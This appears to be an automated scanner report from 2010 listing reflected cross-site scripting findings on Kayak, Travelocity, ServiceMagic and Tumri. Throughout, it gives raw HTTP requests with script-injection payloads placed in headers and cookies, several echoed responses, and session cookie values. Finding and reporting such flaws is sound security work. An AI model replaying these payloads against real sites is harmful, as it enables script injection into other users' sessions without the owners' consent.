Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/hotels/ms/545 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c1727<script>alert(1)</script>e2be0b58233 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload a97a7<script>alert(1)</script>3a64d78464a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/vacations/ms/1511 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a97a7<script>alert(1)</script>3a64d78464a Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 90fb4<script>alert(1)</script>d32fb994530 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/client%20page%20load/front%20door/vacations/ms/237 HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)90fb4<script>alert(1)</script>d32fb994530 Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 669e4<script>alert(1)</script>d80a078640d was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /vs/deals_fd_seeall HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)669e4<script>alert(1)</script>d80a078640d Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eccf3"><a>1c7543510d8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /k/ident/register HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=eccf3"><a>1c7543510d8
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52674"><a>4ad5655037d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /k/ident/signin HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA; Referer: http://www.google.com/search?hl=en&q=52674"><a>4ad5655037d
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a9b8"><script>alert(1)</script>792e32b1d0d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.servicemagic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4a9b8"><script>alert(1)</script>792e32b1d0d
Response
HTTP/1.0 200 OK Set-Cookie: ServerID=1238; path=/ Date: Sun, 12 Dec 2010 15:45:36 GMT Server: Apache/2 Set-Cookie: JSESSIONID=B12B811ED4F8BD4F1B22CBCF8292D360.workerpr038-1; Path=/ Set-Cookie: psacn=; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/ Set-Cookie: csdcn=1292168736064; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/ Set-Cookie: originatingSessionID=1292168736064pwspr038B12B811ED4F8BD4F1B22CBCF8292D360.workerpr038-1; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/ Set-Cookie: psdcn=0; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/ Set-Cookie: csacn=746971; Expires=Wed, 11-Dec-2013 15:45:36 GMT; Path=/ P3P: CP='CAO DSP COR CUR ADMa DEVa PSDa CONi TELi OUR BUS PHY ONL UNI COM NAV INT STA GOV' Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=ISO-8859-1
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15b66"><script>alert(1)</script>acd21509cda was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /ads/ads HTTP/1.1 Host: www.tumri.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=0B7BA190F3D67986CD1922911185CBC8; C=-18871661|2094410516; t_opt=OPT-OUT; Referer: http://www.google.com/search?hl=en&q=15b66"><script>alert(1)</script>acd21509cda
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Expires: Sun Dec 12 15:46:07 UTC 2010 Content-Length: 1432 Date: Sun, 12 Dec 2010 15:46:06 GMT Connection: close
<html><head>
</head><body onclick="" > <!-- Host:web28-us.dc1--> <!-- error serving banner ad : Product/Targeting error during ad request--> <form method="POST" target="_blank" action="http://ats.tu ...[SNIP]... <input type="hidden" name="PublisherURL" value="http://www.google.com/search?hl=en&q=15b66"><script>alert(1)</script>acd21509cda"/> ...[SNIP]...
The value of the tyrg1st cookie is copied into an HTML comment. The payload c6b23--><script>alert(1)</script>f5f5afc855f was submitted in the tyrg1st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /mystuff/ShowCreateAccount.do HTTP/1.1 Host: travel.travelocity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SID=T0042007014101212094421020188304057814; Service=Travelocity; JSESSIONID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; JSID=D97A419890F94FF6FEEE1A7CB80C0B53.p0608; __utmz=54245047.1291431118.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tyrg1st=4D682B341EE14274c6b23--><script>alert(1)</script>f5f5afc855f; intentmedia_user_id=8f13f3ec-a554-4082-b332-38c3d456e131; __utma=54245047.882459144.1291431118.1291431118.1291431118.1; AIR=returningDate=01/02/2011&flightType=roundtrip&children=0&airlineSearchPref=&classOfService=ECONOMY&leavingDate=12/26/2010&minorsAge0=0&dateTypeSelect=exactDates&dateLeavingTime=Anytime&lowestFare=705&leavingFrom=HOU&seniors=0&fareType=all&adults=1&dateReturningTime=Anytime&minorsAge1=0&goingTo=SFO&minorsAge2=0&minorsAge3=0&minorsAge4=0; cbHistoryPerm=QWlyfEhPVXxTRk98MTIvMjYvMjAxMHwwMS8wMi8yMDExfFVTOg==; mbox=PC#1291431114561-411070.20#1293378239|check#true#1292168697|session#1292168636626-269062#1292170497;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 16:01:48 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 51782
<!-- Copyright (C) 2005 Travelocity.com L.P. All rights reserved --> <script type="text/javascript" src="https://a248.e.akamai.net/f/248/5879/1h/i.travelpn.com/10.12/js/global.js"></script> <timer:tim ...[SNIP]... <!-- JSESSIONID = D97A419890F94FF6FEEE1A7CB80C0B53.p0608 TPSESSIONID = T0042007014101212094421020188304057814 Service = TRAVELOCITY TYRG1ST = 4D682B341EE14274c6b23--><script>alert(1)</script>f5f5afc855f --> ...[SNIP]...
The value of the Apache cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b5eeb'-alert(1)-'88d4cc2516e was submitted in the Apache cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /dealssearch HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUwb5eeb'-alert(1)-'88d4cc2516e; p1.med.st=hotels; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. - ...[SNIP]... = false ; var isCarPage = false ; var isCruisePage = false ;
var mediamath = 'http://pixel.mathtag.com/event/js?mt_id=10372&v1=&v2=&v3=&s1=rnneEg-AAABLINUrNs-33-VrVYUwb5eeb'-alert(1)-'88d4cc2516e&s2=30-v87vYjYhHjO3Qb8anwYb&s3='; var showBlueKai = true;
The value of the p1.med.st cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84fdb"-alert(1)-"7414981a4c2 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /in HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels84fdb"-alert(1)-"7414981a4c2; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. ...[SNIP]... <script language="JavaScript" type="text/javascript"> var R9StartPage = new Date(); var isSuppressLogin = false; var StartTab = "hotels84fdb"-alert(1)-"7414981a4c2"; CMP2REQUIREDEST=true; </script> ...[SNIP]...
The value of the p1.med.st cookie is copied into the HTML document as plain text between tags. The payload 8aef2<script>alert(1)</script>0c2bbb02b3e was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels8aef2<script>alert(1)</script>0c2bbb02b3e; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the p1.med.st cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b14b5"><script>alert(1)</script>1a9667087ef was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /in HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotelsb14b5"><script>alert(1)</script>1a9667087ef; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the p1.med.st cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31a6d"><script>alert(1)</script>770106d9556 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /out HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotels31a6d"><script>alert(1)</script>770106d9556; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
The value of the p1.med.st cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e17b5"-alert(1)-"abb999a98f3 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /out HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotelse17b5"-alert(1)-"abb999a98f3; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Copyright 2004-2010 Kayak Software Corp, All Rights Reserved. ...[SNIP]... <script language="JavaScript" type="text/javascript"> var R9StartPage = new Date(); var isSuppressLogin = false; var StartTab = "hotelse17b5"-alert(1)-"abb999a98f3"; CMP2REQUIREDEST=true; </script> ...[SNIP]...
The value of the p1.med.st cookie is copied into the HTML document as plain text between tags. The payload fac7b<script>alert(1)</script>c232d97e3d2 was submitted in the p1.med.st cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /out HTTP/1.1 Host: www.kayak.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: dc=dc2; p1.med.hr=011; profilerPoints=(%7B%22s0000%22%3A%201292168632374%7D); p2.med.sid=; p1.med.sid=30-v87vYjYhHjO3Qb8anwYb; p1.med.r9Origin=HOU; kayak=nkgQn7eBEvzM4grWcGUU; Apache=rnneEg-AAABLINUrNs-33-VrVYUw; p1.med.st=hotelsfac7b<script>alert(1)</script>c232d97e3d2; p1.med.sc=6; p1.med.searched=true; cluster=4; p.med.sid=; p1.med.token=FQzxlJPHTVvUN2eMPU2hxA;